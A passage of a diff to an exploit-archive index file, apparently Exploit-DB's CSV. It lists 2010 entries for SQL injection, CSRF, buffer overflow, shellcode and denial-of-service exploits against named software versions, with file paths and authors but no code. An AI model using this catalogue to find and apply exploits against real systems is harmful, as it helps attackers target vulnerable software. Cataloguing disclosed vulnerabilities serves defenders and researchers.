Vulnerability",2010-07-12,Sid3^effects,php,webapps,0 14318,platforms/php/webapps/14318.html,"Elite CMS 1.01 - Multiple XSS/CSRF Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0 14319,platforms/php/webapps/14319.pl,"PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0 14320,platforms/php/webapps/14320.pl,"PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0 -14321,platforms/windows/remote/14321.html,"Image22 - ActiveX 1.1.1 - Buffer Overflow Exploit",2010-07-10,blake,windows,remote,0 -14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact Organizer SQL Injection Vulnerability",2010-07-10,v3n0m,php,webapps,0 @@ -12547,35 +12593,26 @@ id,file,description,date,author,platform,type,port 14330,platforms/php/webapps/14330.html,"TomatoCart 1.0.1 - Multiple CSRF Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0 14331,platforms/php/webapps/14331.html,"TomatoCMS 2.0.5 - Multiple CSRF Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0 14332,platforms/linux/shellcode/14332.c,"Linux x86 netcat bindshell port 8080 - 75 bytes",2010-07-11,blake,linux,shellcode,0 -14333,platforms/php/webapps/14333.html,"Orbis CMS 1.0.2 - Multiple CSRF Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0 -14334,platforms/lin_x86/shellcode/14334.c,"Linux x86 netcat connect back port 8080 - 76 bytes",2010-07-11,blake,lin_x86,shellcode,0 -14335,platforms/php/webapps/14335.txt,"Joomla Health & Fitness Stats Persistent XSS Vulnerability",2010-07-12,Sid3^effects,php,webapps,0 14336,platforms/php/webapps/14336.txt,"Joomla EasyBlog Persistent XSS Vulnerability",2010-07-12,Sid3^effects,php,webapps,0 14337,platforms/php/webapps/14337.html,"TheHostingTool 1.2.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 14338,platforms/php/webapps/14338.html,"GetSimple CMS 2.01 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-12,10n1z3d,php,webapps,0 14339,platforms/linux/local/14339.sh,"Ubuntu PAM 1.1.0 MOTD - Local Root Exploit",2010-07-12,anonymous,linux,local,0 -14341,platforms/php/webapps/14341.html,"Campsite CMS 3.4.0 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 14342,platforms/php/webapps/14342.html,"Grafik CMS 1.1.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 +14355,platforms/windows/webapps/14355.txt,"dotDefender 4.02 - Authentication Bypass Vulnerability",2010-07-13,"David K",windows,webapps,0 14344,platforms/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 (wpd) Buffer Overflow PoC",2010-07-12,LiquidWorm,windows,dos,0 14346,platforms/windows/dos/14346.txt,"Corel Presentations X5 15.0.0.357 (shw) Buffer Preoccupation PoC",2010-07-12,LiquidWorm,windows,dos,0 -14349,platforms/windows/dos/14349.html,"Opera - Denial of Service by canvas Element",2010-07-12,"Pouya Daneshmand",windows,dos,0 14350,platforms/php/webapps/14350.txt,"Joomla Component QContacts (com_qcontacts) SQL Injection Vulnerability",2010-07-13,_mlk_,php,webapps,0 +14349,platforms/windows/dos/14349.html,"Opera - Denial of Service by canvas Element",2010-07-12,"Pouya Daneshmand",windows,dos,0 14351,platforms/php/webapps/14351.txt,"I-net Enquiry Management Script SQL Injection Vulnerability",2010-07-13,D4rk357,php,webapps,0 -14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - SEH Exploit (Multiple OS, DEP and ASLR Bypass)",2010-07-13,Node,windows,local,0 +14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - SEH Exploit (Multiple OS - DEP and ASLR Bypass)",2010-07-13,Node,windows,local,0 14353,platforms/php/webapps/14353.html,"Diferior CMS 8.03 - Multiple CSRF Vulnerabilities",2010-07-13,10n1z3d,php,webapps,0 14354,platforms/php/webapps/14354.txt,"AJ Article Persistent XSS Vulnerability",2010-07-13,Sid3^effects,php,webapps,0 -14355,platforms/windows/webapps/14355.txt,"dotDefender 4.02 - Authentication Bypass Vulnerability",2010-07-13,"David K",windows,webapps,0 14356,platforms/php/webapps/14356.txt,"CustomCMS Persistent XSS Vulnerability",2010-07-13,Sid3^effects,php,webapps,0 14357,platforms/php/webapps/14357.txt,"2daybiz Businesscard Script Authentication bypass",2010-07-14,D4rk357,php,webapps,0 -14359,platforms/php/webapps/14359.html,"Zenphoto CMS 1.3 - Multiple CSRF Vulnerabilities",2010-07-14,10n1z3d,php,webapps,0 -14360,platforms/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 - Remote Command Execution Vulnerability",2010-07-14,"Meder Kydyraliev",multiple,remote,0 14361,platforms/windows/local/14361.py,"Microsoft Excel 0x5D record Stack Overflow Vulnerability",2010-07-14,webDEViL,windows,local,0 14362,platforms/php/webapps/14362.txt,"CMSQLite - SQL Injection Vulnerability",2010-07-14,"High-Tech Bridge SA",php,webapps,0 -14363,platforms/php/webapps/14363.txt,"Ad Network Script Persistent XSS Vulnerability",2010-07-14,Sid3^effects,php,webapps,0 -14364,platforms/php/webapps/14364.html,"eXtreme Message Board 1.9.11 - Multiple CSRF Vulnerabilities",2010-07-15,10n1z3d,php,webapps,0 14365,platforms/php/webapps/14365.txt,"Campsite CMS Remote Persistent XSS Vulnerability",2010-07-15,D4rk357,php,webapps,0 14366,platforms/php/webapps/14366.txt,"Whizzy CMS <= 10.01 - Local File Inclusion Vulnerability",2010-07-15,"Anarchy Angel",php,webapps,0 -14367,platforms/multiple/dos/14367.txt,"Novell Groupwise Webaccess Stack Overflow",2010-07-15,"Francis Provencher",multiple,dos,0 14368,platforms/php/webapps/14368.txt,"RedShop 1.0.23.1 Joomla Component Blind SQL Injection Vulnerability",2010-07-15,"Salvatore Fresta",php,webapps,0 14369,platforms/jsp/webapps/14369.txt,"ORACLE Business Process Management (Process Administrator) 5.7-6.0-10.3 - XSS",2010-07-15,Markot,jsp,webapps,0 14370,platforms/php/webapps/14370.txt,"BS Scripts Directory (info.php) SQL Injection Vulnerability",2010-07-15,D4rk357,php,webapps,0 @@ -12592,6 +12629,8 @@ id,file,description,date,author,platform,type,port 14381,platforms/php/webapps/14381.txt,"Group Office Remote Command Execution Vulnerability",2010-07-16,"ADEO Security",php,webapps,0 14382,platforms/windows/webapps/14382.txt,"ActiTime 2.0-MA CSRF Vulnerability",2010-07-16,Markot,windows,webapps,0 14383,platforms/php/webapps/14383.txt,"Group Office (comment_id) SQL Injection Vulnerability",2010-07-16,"Canberk BOLAT",php,webapps,0 +14420,platforms/asp/webapps/14420.txt,"Mayasan Portal 2.0 - (makaledetay.asp) SQL Injection Vulnerability",2010-07-20,v0calist,asp,webapps,0 +14421,platforms/asp/webapps/14421.txt,"Mayasan Portal 2.0 - (haberdetay.asp) SQL Injection Vulnerability",2010-07-20,CoBRa_21,asp,webapps,0 14385,platforms/windows/remote/14385.html,"Avant Browser 11.7 build 45 - Clickjacking Vulnerability",2010-07-17,"Pouya Daneshmand",windows,remote,0 14386,platforms/multiple/remote/14386.html,"Opera Browser 10.60 - Clickjacking Vulnerability",2010-07-17,"Pouya Daneshmand",multiple,remote,0 14387,platforms/multiple/remote/14387.html,"Safari Browser 4.0.2 - Clickjacking Vulnerability",2010-07-17,"Pouya Daneshmand",multiple,remote,0 @@ -12604,13 +12643,13 @@ id,file,description,date,author,platform,type,port 14394,platforms/php/webapps/14394.txt,"Joomla Component (com_spa) SQL Injection Vulnerability",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0 14395,platforms/php/webapps/14395.txt,"Joomla Component (com_staticxt) SQL Injection Vulnerability",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0 14397,platforms/windows/local/14397.rb,"MoreAmp SEH Buffer Overflow (meta)",2010-07-17,Madjix,windows,local,0 +14404,platforms/php/webapps/14404.txt,"Kayako eSupport (functions.php) 3.70.02 - SQL Injection Vulnerability",2010-07-18,ScOrPiOn,php,webapps,0 +14405,platforms/php/webapps/14405.txt,"PHP-Fusion Remote Command Execution Vulnerability",2010-07-18,"ViRuS Qalaa",php,webapps,0 14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - MKD Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-17,"Karn Ganeshen",windows,remote,0 14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - LIST Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-17,"Karn Ganeshen",windows,remote,0 14401,platforms/asp/webapps/14401.txt,"ClickAndRank Script - Authentication Bypass",2010-07-18,walid,asp,webapps,0 14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - CWD Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-18,fdisk,windows,remote,0 14403,platforms/windows/local/14403.txt,"Microsoft Windows Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0 -14404,platforms/php/webapps/14404.txt,"Kayako eSupport (functions.php) 3.70.02 - SQL Injection Vulnerability",2010-07-18,ScOrPiOn,php,webapps,0 -14405,platforms/php/webapps/14405.txt,"PHP-Fusion Remote Command Execution Vulnerability",2010-07-18,"ViRuS Qalaa",php,webapps,0 14406,platforms/bsd/local/14406.pl,"GhostScript PostScript File Stack Overflow Exploit",2010-07-18,"Rodrigo Rubira Branco",bsd,local,0 14407,platforms/aix/remote/14407.c,"rpc.pcnfsd Remote Format String Exploit",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0 14408,platforms/windows/dos/14408.py,"Really Simple IM 1.3beta DoS Proof of Concept",2010-07-18,loneferret,windows,dos,0 @@ -12622,8 +12661,6 @@ id,file,description,date,author,platform,type,port 14415,platforms/php/webapps/14415.html,"EZ-Oscommerce 3.1 - Remote File Upload",2010-07-20,indoushka,php,webapps,0 14416,platforms/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption Exploit",2010-07-20,"Elazar Broad",windows,remote,0 14419,platforms/asp/webapps/14419.txt,"Caner Hikaye Script SQL Injection Vulnerability",2010-07-20,v0calist,asp,webapps,0 -14420,platforms/asp/webapps/14420.txt,"Mayasan Portal 2.0 - (makaledetay.asp) SQL Injection Vulnerability",2010-07-20,v0calist,asp,webapps,0 -14421,platforms/asp/webapps/14421.txt,"Mayasan Portal 2.0 - (haberdetay.asp) SQL Injection Vulnerability",2010-07-20,CoBRa_21,asp,webapps,0 14422,platforms/multiple/dos/14422.c,"libpng <= 1.4.2 - Denial of Service Vulnerability",2010-07-20,kripthor,multiple,dos,0 14423,platforms/php/webapps/14423.txt,"Joomla Component com_spa SQL Injection Vulnerability",2010-07-20,"ALTBTA ",php,webapps,0 14424,platforms/windows/dos/14424.txt,"Lithtech Engine Memory Corruption Vulnerability",2010-07-20,"Luigi Auriemma",windows,dos,0 @@ -12631,11 +12668,10 @@ id,file,description,date,author,platform,type,port 14426,platforms/php/webapps/14426.pl,"Imagine-cms <= 2.50 SQL Injection Exploit Vulnerability",2010-07-21,Metropolis,php,webapps,0 14427,platforms/windows/webapps/14427.txt,"Outlook Web Access 2003 - CSRF Vulnerability",2010-07-21,anonymous,windows,webapps,0 14428,platforms/windows/local/14428.py,"QQPlayer asx File Processing Buffer Overflow Exploit",2010-07-21,"Li Qingshan",windows,local,0 -14430,platforms/php/webapps/14430.txt,"RapidLeech Scripts Remote File Upload Vulnerability",2010-07-21,H-SK33PY,php,webapps,0 14431,platforms/windows/local/14431.py,"QQPlayer cue File Buffer Overflow Exploit",2010-07-21,"Lufeng Li",windows,local,0 14432,platforms/php/webapps/14432.txt,"OpenX (phpAdsNew) Remote File inclusion Vulnerability",2010-07-21,"ViRuS Qalaa",php,webapps,0 +14430,platforms/php/webapps/14430.txt,"RapidLeech Scripts Remote File Upload Vulnerability",2010-07-21,H-SK33PY,php,webapps,0 14433,platforms/windows/local/14433.pl,"ZipCentral (.zip) Buffer Overflow (SEH)",2010-07-21,"Jiten Pathy",windows,local,0 -14434,platforms/php/webapps/14434.txt,"Joomla Component com_jomtube (user_id) Blind SQL Injection / SQL Injection",2010-07-22,SixP4ck3r,php,webapps,0 14435,platforms/php/webapps/14435.txt,"AJ HYIP PRIME (welcome.php id) Blind SQL Injection Vulnerability",2010-07-22,JosS,php,webapps,0 14436,platforms/php/webapps/14436.txt,"AJ HYIP MERIDIAN (news.php id) Blind SQL Injection Vulnerability",2010-07-22,JosS,php,webapps,0 14437,platforms/php/webapps/14437.txt,"Free PHP photo gallery script Remote Command Execution Vulnerability",2010-07-22,"ViRuS Qalaa",php,webapps,0 @@ -12672,23 +12708,23 @@ id,file,description,date,author,platform,type,port 14470,platforms/php/webapps/14470.txt,"Ballettin Forum SQL Injection Vulnerability",2010-07-25,3v0,php,webapps,0 14471,platforms/php/webapps/14471.txt,"CMS Ignition SQL Injection Exploit",2010-07-25,neavorc,php,webapps,0 14472,platforms/php/webapps/14472.txt,"WhiteBoard 0.1.30 - Multiple Blind SQL Injection Vulnerabilities",2010-07-25,"Salvatore Fresta",php,webapps,0 +14483,platforms/php/webapps/14483.pl,"PunBB <= 1.3.4 & Pun_PM <= 1.2.6 - Remote Blind SQL Injection Exploit",2010-07-27,Dante90,php,webapps,0 14474,platforms/php/webapps/14474.txt,"Freeway CMS 1.4.3.210 SQL Injection Vulnerability",2010-07-26,**RoAd_KiLlEr**,php,webapps,0 14476,platforms/php/webapps/14476.txt,"Joomla Component (com_joomla-visites) Remote File inclusion Vulnerability",2010-07-26,Li0n-PaL,php,webapps,0 14477,platforms/windows/dos/14477.txt,"Media Player Classic - Heap Overflow/DoS Vulnerability",2010-07-26,"Praveen Darshanam",windows,dos,0 14481,platforms/php/webapps/14481.txt,"Joomla Component TTVideo 1.0 - SQL Injection Vulnerability",2010-07-27,"Salvatore Fresta",php,webapps,0 14482,platforms/windows/local/14482.py,"QQPlayer 2.3.696.400p1 - smi File Buffer Overflow Exploit",2010-07-27,"Lufeng Li",windows,local,0 -14483,platforms/php/webapps/14483.pl,"PunBB <= 1.3.4 & Pun_PM <= 1.2.6 - Remote Blind SQL Injection Exploit",2010-07-27,Dante90,php,webapps,0 14484,platforms/windows/dos/14484.html,"Internet Explorer 6 / 7 - Remote DoS Vulnerability",2010-07-27,"Richard leahy",windows,dos,0 14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion Vulnerability",2010-07-27,"John Leitch",php,webapps,0 +14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 - Local Privilege Escalation Vulnerability",2010-07-28,th_decoder,windows,local,0 +14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - HTTP Remote Buffer Overflow (Post Auth)",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 +14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdisk,windows,local,0 14488,platforms/php/webapps/14488.txt,"joomla component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0 14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 utf8 - Directory Traversal Vulnerability",2010-07-28,mywisdom,unix,remote,0 14490,platforms/php/webapps/14490.txt,"nuBuilder Remote File inclusion Vulnerability",2010-07-28,Ahlspiess,php,webapps,0 -14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 - Local Privilege Escalation Vulnerability",2010-07-28,th_decoder,windows,local,0 14492,platforms/windows/remote/14492.c,"Symantec Ams Intel Alert Handler Service Design Flaw",2010-07-28,Spider,windows,remote,0 14494,platforms/php/webapps/14494.txt,"AV Arcade 3 - Cookie SQL Injection Authentication Bypass",2010-07-28,saudi0hacker,php,webapps,0 14495,platforms/php/webapps/14495.txt,"Joomla Component PhotoMap Gallery 1.6.0 - Multiple Blind SQL Injection",2010-07-28,"Salvatore Fresta",php,webapps,0 -14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - HTTP Remote Buffer Overflow (Post Auth)",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 -14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdisk,windows,local,0 14499,platforms/php/webapps/14499.txt,"Joomla Component PBBooking 1.0.4_3 - Multiple Blind SQL Injection",2010-07-29,"Salvatore Fresta",php,webapps,0 14500,platforms/php/webapps/14500.txt,"Whizzy CMS 10.02 - Local File Inclusion",2010-07-29,"Anarchy Angel",php,webapps,0 14501,platforms/php/webapps/14501.txt,"Joomla SimpleShop Component (com_simpleshop) SQL Injection Vulnerability",2010-07-29,"UnD3rGr0unD W4rri0rZ",php,webapps,0 @@ -12697,8 +12733,9 @@ id,file,description,date,author,platform,type,port 14504,platforms/windows/dos/14504.html,"BarCodeWiz BarCode ActiveX 3.29 PoC",2010-07-30,loneferret,windows,dos,0 14505,platforms/windows/remote/14505.html,"BarCodeWiz Barcode ActiveX Control 3.29 BoF Exploit (SEH)",2010-07-30,loneferret,windows,remote,0 14511,platforms/windows/dos/14511.pl,"ChordPulse 1.4 - Denial of Service Vulnerability",2010-07-30,Madjix,windows,dos,0 -14512,platforms/php/webapps/14512.txt,"Concept E-commerce SQL Injection Vulnerability",2010-07-31,gendenk,php,webapps,0 14514,platforms/windows/remote/14514.html,"SigPlus Pro 3.74 - ActiveX LCDWriteString() Remote BoF JIT Spray - aslr/dep bypass",2010-07-31,mr_me,windows,remote,0 +14525,platforms/windows/dos/14525.pl,"Jaangle 0.98e.971 - Denial of Service Vulnerability",2010-08-02,s-dz,windows,dos,0 +14527,platforms/windows/local/14527.pl,"WM Downloader 3.1.2.2 - Buffer Overflow Exploit",2010-08-02,s-dz,windows,local,0 14515,platforms/windows/dos/14515.pl,"Xmyplay 3.5.1 - Denial of Service Vulnerability",2010-07-31,s-dz,windows,dos,0 14517,platforms/windows/dos/14517.pl,"Xion Audio Player 1.0.125 - Denial of Service Vulnerability",2010-07-31,s-dz,windows,dos,0 14518,platforms/php/webapps/14518.txt,"Joomla Component Spielothek 1.6.9 - Multiple Blind SQL Injection",2010-07-31,"Salvatore Fresta",php,webapps,0 @@ -12706,64 +12743,62 @@ id,file,description,date,author,platform,type,port 14521,platforms/hardware/webapps/14521.txt,"Intellinet IP Camera MNC-L10 - Authentication Bypass Vulnerability",2010-08-01,Magnefikko,hardware,webapps,0 14522,platforms/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure and HTTP Authentication Bypass",2010-08-01,"Ben Schmidt",windows,remote,0 14523,platforms/php/webapps/14523.txt,"SnoGrafx (cat.php?cat) SQL Injection Vulnerability",2010-08-02,CoBRa_21,php,webapps,0 -14525,platforms/windows/dos/14525.pl,"Jaangle 0.98e.971 - Denial of Service Vulnerability",2010-08-02,s-dz,windows,dos,0 -14527,platforms/windows/local/14527.pl,"WM Downloader 3.1.2.2 - Buffer Overflow Exploit",2010-08-02,s-dz,windows,local,0 14528,platforms/php/webapps/14528.txt,"APT-WEBSHOP-SYSTEM modules.php SQL Injection Vulnerability",2010-08-02,secret,php,webapps,0 14530,platforms/php/webapps/14530.txt,"Joomla CamelcityDB 2.2 - SQL Injection Vulnerability",2010-08-02,Amine_92,php,webapps,0 14531,platforms/php/webapps/14531.pdf,"MyIT CRM - Multiple Cross-Site Scripting (XSS)",2010-08-02,"Juan Manuel Garcia",php,webapps,0 14532,platforms/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Cnvrtr Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",windows,local,0 14533,platforms/windows/dos/14533.txt,"Avast! Internet Security 5.0 aswFW.sys kernel driver IOCTL Memory Pool Corruption",2010-08-03,x90c,windows,dos,0 14534,platforms/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Include Vulnerability",2010-08-03,eidelweiss,php,webapps,0 -14536,platforms/hardware/remote/14536.txt,"Unauthorized Access to Root NFS Export on EMC Celerra NAS Appliance",2010-08-03,"Trustwave's SpiderLabs",hardware,remote,0 -14537,platforms/multiple/dos/14537.txt,"Oracle MySQL 'ALTER DATABASE' Remote Denial of Service Vulnerability",2010-08-03,"Shane Bester",multiple,dos,0 14538,platforms/ios/local/14538.txt,"Apple iOS pdf Jailbreak Exploit",2010-08-03,jailbreakme,ios,local,0 14539,platforms/windows/remote/14539.html,"FathFTP 1.8 (RasIsConnected Method) ActiveX Buffer Overflow (SEH)",2010-08-03,Madjix,windows,remote,0 +14536,platforms/hardware/remote/14536.txt,"Unauthorized Access to Root NFS Export on EMC Celerra NAS Appliance",2010-08-03,"Trustwave's SpiderLabs",hardware,remote,0 +14537,platforms/multiple/dos/14537.txt,"Oracle MySQL 'ALTER DATABASE' Remote Denial of Service Vulnerability",2010-08-03,"Shane Bester",multiple,dos,0 +14558,platforms/php/webapps/14558.txt,"sX-Shop Multiple SQL Injection Vulnerabilities",2010-08-05,CoBRa_21,php,webapps,0 14541,platforms/php/webapps/14541.txt,"WordPress NextGEN Smooth Gallery 0.12 - Blind SQL Injection Vulnerability",2010-08-03,kaMtiEz,php,webapps,0 +14550,platforms/windows/local/14550.py,"Exploit Easy RM to MP3 2.7.3.700 - (.m3u & .pls & .smi & .wpl & .wax & .wvx & .ram)",2010-08-04,"Oh Yaw Theng",windows,local,0 14545,platforms/windows/dos/14545.txt,"Progitek Visionner Photos 2.0 - File Format DoS",2010-08-03,antrhacks,windows,dos,0 +14566,platforms/windows/local/14566.c,"Microsoft Windows - Win32k.sys Driver ""CreateDIBPalette()"" Buffer Overflow",2010-08-06,Arkon,windows,local,0 14547,platforms/windows/remote/14547.txt,"HP OpenView NNM 7.53 OvJavaLocale - Buffer Overflow Vulnerability",2010-08-03,"Nahuel Riva",windows,remote,0 -14550,platforms/windows/local/14550.py,"Exploit Easy RM to MP3 2.7.3.700 - (.m3u , .pls , .smi , .wpl , .wax , .wvx , .ram)",2010-08-04,"Oh Yaw Theng",windows,local,0 14551,platforms/windows/remote/14551.html,"FathFTP 1.8 - (DeleteFile Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0 14552,platforms/windows/remote/14552.html,"FathFTP 1.8 (EnumFiles Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0 14553,platforms/windows/remote/14553.html,"FathFTP 1.8 (FileExists Method) ActiveX Buffer Overflow (SEH)",2010-08-04,H4kr3m,windows,remote,0 +14557,platforms/php/webapps/14557.txt,"sX-Shop (view_image.php) SQL Injection Vulnerability",2010-08-05,secret,php,webapps,0 14555,platforms/windows/dos/14555.py,"Mediamonkey 3.2.1.1297 - DoS PoC",2010-08-05,anonymous,windows,dos,0 14556,platforms/php/webapps/14556.txt,"Nuked-Klan Module Partenaires NK 1.5 - Blind SQL Injection",2010-08-05,Metropolis,php,webapps,0 -14557,platforms/php/webapps/14557.txt,"sX-Shop (view_image.php) SQL Injection Vulnerability",2010-08-05,secret,php,webapps,0 -14558,platforms/php/webapps/14558.txt,"sX-Shop Multiple SQL Injection Vulnerabilities",2010-08-05,CoBRa_21,php,webapps,0 14559,platforms/php/webapps/14559.txt,"APBoard 2.1.0 - (board.php?id=) SQL Injection Vulnerability",2010-08-05,secret,php,webapps,0 14560,platforms/php/webapps/14560.txt,"ccTiddly 1.7.6 - Multiple Remote File Inclusion Vulnerabilities",2010-08-05,eidelweiss,php,webapps,0 +14569,platforms/php/webapps/14569.txt,"joomla component cgtestimonial 2.2 - Multiple Vulnerabilities",2010-08-06,"Salvatore Fresta",php,webapps,0 14562,platforms/php/webapps/14562.html,"Open Blog 1.2.1 - CSRF Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 14563,platforms/php/webapps/14563.html,"BXR 0.6.8 - CSRF Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 14564,platforms/php/webapps/14564.html,"Amethyst 0.1.5 - XSS Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 14565,platforms/php/webapps/14565.html,"DiamondList 0.1.6 - Cross-Site Request Forgery Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 -14566,platforms/windows/local/14566.c,"Microsoft Windows - Win32k.sys Driver ""CreateDIBPalette()"" Buffer Overflow",2010-08-06,Arkon,windows,local,0 -14569,platforms/php/webapps/14569.txt,"joomla component cgtestimonial 2.2 - Multiple Vulnerabilities",2010-08-06,"Salvatore Fresta",php,webapps,0 +14576,platforms/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",windows,local,0 +14573,platforms/linux/dos/14573.txt,"LibTIFF 'td_stripbytecount' NULL Pointer Dereference Remote Denial of Service Vulnerability",2010-08-07,"Tomas Hoger",linux,dos,0 14570,platforms/php/webapps/14570.txt,"Joomla Component com_neorecruit 1.4 - SQL Injection Vulnerability",2010-08-07,v3n0m,php,webapps,0 14572,platforms/php/webapps/14572.txt,"Tycoon CMS Record Script 1.0.9 - SQL Injection Vulnerability",2010-08-07,Silic0n,php,webapps,0 -14573,platforms/linux/dos/14573.txt,"LibTIFF 'td_stripbytecount' NULL Pointer Dereference Remote Denial of Service Vulnerability",2010-08-07,"Tomas Hoger",linux,dos,0 -14576,platforms/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",windows,local,0 14578,platforms/php/webapps/14578.php,"PHPKick 0.8 - statistics.php SQL Injection Exploit",2010-08-08,garwga,php,webapps,0 14580,platforms/windows/remote/14580.html,"Advanced File Vault - (eSellerateControl350.dll) ActiveX Heap Spray (0day)",2010-08-08,"ThE g0bL!N",windows,remote,0 14581,platforms/windows/local/14581.py,"myMP3-Player 3.0 - Buffer Overflow Exploit",2010-08-08,"Oh Yaw Theng",windows,local,0 14582,platforms/windows/dos/14582.pl,"ffdshow Video Codec Denial of Service Vulnerability",2010-08-08,"Nishant Das Patnaik",windows,dos,0 +14587,platforms/windows/dos/14587.py,"Visual MP3 Splitter & Joiner 6.1 - Denial of Service Vulnerability",2010-08-09,"Oh Yaw Theng",windows,dos,0 14584,platforms/windows/dos/14584.py,"QQ Computer Manager TSKsp.sys Local Denial of Service Exploit",2010-08-09,"Lufeng Li",windows,dos,0 14585,platforms/php/webapps/14585.php,"kleeja 1.0.0RC6 Database Disclosure",2010-08-09,indoushka,php,webapps,0 14586,platforms/windows/remote/14586.html,"dBpowerAMP Audio Player 2 - (FileExists) ActiveX Buffer Overflow Exploit",2010-08-09,s-dz,windows,remote,0 -14587,platforms/windows/dos/14587.py,"Visual MP3 Splitter & Joiner 6.1 - Denial of Service Vulnerability",2010-08-09,"Oh Yaw Theng",windows,dos,0 -14589,platforms/php/webapps/14589.txt,"Php Nuke 8.x.x - BlindSQL Injection Vulnerability",2010-08-09,ITSecTeam,php,webapps,0 +14598,platforms/php/webapps/14598.txt,"Joomla Component Teams Multiple Blind SQL Injection Vulnerabilities",2010-08-10,"Salvatore Fresta",php,webapps,0 14591,platforms/windows/local/14591.py,"Fat Player 0.6b - WAV File Processing Buffer Overflow (SEH)",2010-08-09,"Praveen Darshanam",windows,local,0 +14589,platforms/php/webapps/14589.txt,"Php Nuke 8.x.x - BlindSQL Injection Vulnerability",2010-08-09,ITSecTeam,php,webapps,0 14592,platforms/php/webapps/14592.txt,"Joomla Yellowpages SQL Injection Vulnerability",2010-08-09,"al bayraqim",php,webapps,0 14593,platforms/windows/dos/14593.htm,"AoAAudioExtractor 2.0.0.0 - ActiveX PoC (SEH)",2010-08-09,s-dz,windows,dos,0 14594,platforms/linux/dos/14594.py,"Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS",2010-08-09,"Jon Oberheide",linux,dos,0 14595,platforms/php/webapps/14595.html,"wizmall 6.4 - CSRF Vulnerabilities",2010-08-09,pyw1414,php,webapps,0 14596,platforms/php/webapps/14596.txt,"Joomla Component Amblog 1.0 - Multiple SQL Injection Vulnerabilities",2010-08-10,"Salvatore Fresta",php,webapps,0 14597,platforms/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder Denial of Service Vulnerability",2010-08-10,"Oh Yaw Theng",windows,dos,0 -14598,platforms/php/webapps/14598.txt,"Joomla Component Teams Multiple Blind SQL Injection Vulnerabilities",2010-08-10,"Salvatore Fresta",php,webapps,0 14599,platforms/windows/remote/14599.txt,"AoA Audio Extractor Remote ActiveX SEH JIT Spray Exploit (ASLR+DEP Bypass)",2010-08-10,Dr_IDE,windows,remote,0 14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - Remote Exploit (0day)",2010-08-10,sud0,windows,remote,0 14601,platforms/windows/dos/14601.py,"Rosoft media player 4.4.4 SEH Buffer Overflow PoC",2010-08-10,anonymous,windows,dos,0 14602,platforms/multiple/remote/14602.txt,"Play! Framework <= 1.0.3.1 - Directory Transversal Vulnerability",2010-08-10,kripthor,multiple,remote,0 -14604,platforms/windows/remote/14604.py,"Easy FTP - BoF Vulnerabilities in NLST , NLST -al, APPE, RETR , SIZE and XCWD 